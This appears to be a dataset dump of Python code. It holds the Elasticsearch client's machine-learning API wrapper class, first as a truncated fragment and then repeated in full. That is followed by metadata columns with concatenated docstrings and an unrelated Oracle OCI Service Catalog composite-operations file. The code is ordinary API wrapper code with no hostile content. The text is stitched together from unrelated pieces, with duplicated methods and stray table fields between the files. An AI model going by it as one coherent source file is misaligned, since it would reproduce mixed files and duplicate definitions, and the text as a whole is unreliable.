for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
:arg desc: whether the results should be sorted in decending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
| from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: None
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score:
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Default
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
:arg desc: whether the results should be sorted in decending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
| en | 0.712137 | :arg filter_id: The ID of the filter to fetch :arg from_: skips a number of filters :arg size: specifies a max number of filters to get `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_ :arg datafeed_id: The ID of the datafeeds to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_ :arg datafeed_id: The ID of the datafeeds stats to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_ :arg job_id: ID of the job to get bucket results from :arg timestamp: The timestamp of the desired single bucket result :arg body: Bucket selection details if not provided in URI :arg anomaly_score: Filter for the most anomalous buckets :arg desc: Set the sort direction :arg end: End time filter for buckets :arg exclude_interim: Exclude interim results :arg expand: Include anomaly records :arg from_: skips a number of buckets :arg size: specifies a max number of buckets to get :arg sort: Sort buckets by a particular field :arg start: Start time filter for buckets `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_ :arg job_id: The name of the job receiving the data :arg body: The data to process :arg reset_end: Optional parameter to specify the end of the bucket resetting range :arg reset_start: Optional parameter to specify the start of the bucket resetting range `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to stop :arg force: True if the datafeed should be forcefully stopped. :arg timeout: Controls the time to wait until a datafeed has stopped. Default to 20 seconds `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_ :arg job_id: The ID of the jobs to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_ :arg job_id: The ID of the job to create :arg body: The job :arg body: The detector `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to start :arg body: The start datafeed parameters :arg end: The end time when the datafeed should stop. When not set, the datafeed continues in real time :arg start: The start time from where the datafeed should begin :arg timeout: Controls the time to wait until a datafeed has started. Default to 20 seconds `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_ :arg job_id: None :arg body: Record selection criteria :arg desc: Set the sort direction :arg end: End time filter for records :arg exclude_interim: Exclude interim results :arg from_: skips a number of records :arg record_score: :arg size: specifies a max number of records to get :arg sort: Sort records by a particular field :arg start: Start time filter for records `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_ :arg job_id: The ID of the job to create :arg body: The job update settings :arg filter_id: The ID of the filter to create :arg body: The filter details `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to update :arg body: The datafeed update settings `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to preview `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_ :arg job_id: The name of the job to flush :arg body: Flush parameters :arg advance_time: Advances time to the given value generating results and updating the model for the advanced interval :arg calc_interim: Calculates interim results for the most recent bucket or all buckets within the latency period :arg end: When used in conjunction with calc_interim, specifies the range of buckets on which to calculate interim results :arg skip_time: Skips time to the given value without generating results or updating the model for the skipped interval :arg start: When used in conjunction with calc_interim, specifies the range of buckets on which to calculate interim results `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_ :arg job_id: The name of the job to close :arg force: True if the job should be forcefully closed :arg timeout: Controls the time to wait until a job has closed. Default to 30 minutes `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_ :arg job_id: The ID of the job to open `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_ :arg job_id: The ID of the job to delete :arg force: True if the job should be forcefully deleted `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to update :arg body: The model snapshot properties to update :arg filter_id: The ID of the filter to delete :arg body: The job config `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_ :arg job_id: The name of the job :arg category_id: The identifier of the category definition of interest :arg body: Category selection details if not provided in URI :arg from_: skips a number of categories :arg size: specifies a max number of categories to get `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_ :arg job_id: None :arg body: Influencer selection criteria :arg desc: whether the results should be sorted in decending order :arg end: end timestamp for the requested influencers :arg exclude_interim: Exclude interim results :arg from_: skips a number of influencers :arg influencer_score: influencer score threshold for the requested influencers :arg size: specifies a max number of influencers to get :arg sort: sort field for the requested influencers :arg start: start timestamp for the requested influencers `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to create :arg body: The datafeed config `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to delete :arg force: True if the datafeed should be forcefully deleted `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_ :arg job_id: The ID of the jobs stats to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to revert to :arg body: Reversion options :arg delete_intervening_results: Should we reset the results back to the time of the snapshot? `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to fetch :arg body: Model snapshot selection criteria :arg desc: True if the results should be sorted in descending order :arg end: The filter 'end' query parameter :arg from_: Skips a number of documents :arg size: The default number of documents returned in queries as a string. :arg sort: Name of the field to sort on :arg start: The filter 'start' query parameter `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to delete | 2.366878 | 2 |
src/oci/service_catalog/service_catalog_client_composite_operations.py | LaudateCorpus1/oci-python-sdk | 0 | 9131 | <filename>src/oci/service_catalog/service_catalog_client_composite_operations.py
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ServiceCatalogClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ServiceCatalogClientCompositeOperations object
:param ServiceCatalogClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_private_application_compartment_and_wait_for_state(self, private_application_id, change_private_application_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_private_application_compartment(private_application_id, change_private_application_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_private_application_and_wait_for_state(self, create_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_private_application(create_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
